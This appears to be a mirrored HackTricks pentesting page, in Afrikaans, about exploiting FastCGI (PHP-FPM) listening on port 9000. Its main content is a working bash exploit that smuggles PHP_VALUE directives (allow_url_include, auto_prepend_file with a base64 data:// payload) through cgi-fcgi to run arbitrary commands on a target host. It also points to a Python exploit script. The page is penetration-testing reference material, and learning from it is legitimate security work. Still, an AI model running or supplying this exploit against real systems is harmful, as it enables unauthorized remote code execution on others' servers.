mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1.2 KiB
1.2 KiB
{{#include ../banners/hacktricks-training.md}}
Basiese Inligting
As jy wil leer wat FastCGI is, kyk na die volgende bladsy:
{{#ref}} pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md {{#endref}}
Standaard loop FastCGI op poort 9000 en word nie deur nmap erken nie. Gewoonlik luister FastCGI net op localhost.
RCE
Dit is redelik maklik om FastCGI te laat uitvoer arbitrêre kode:
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
of jy kan ook die volgende python-skrip gebruik: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
{{#include ../banners/hacktricks-training.md}}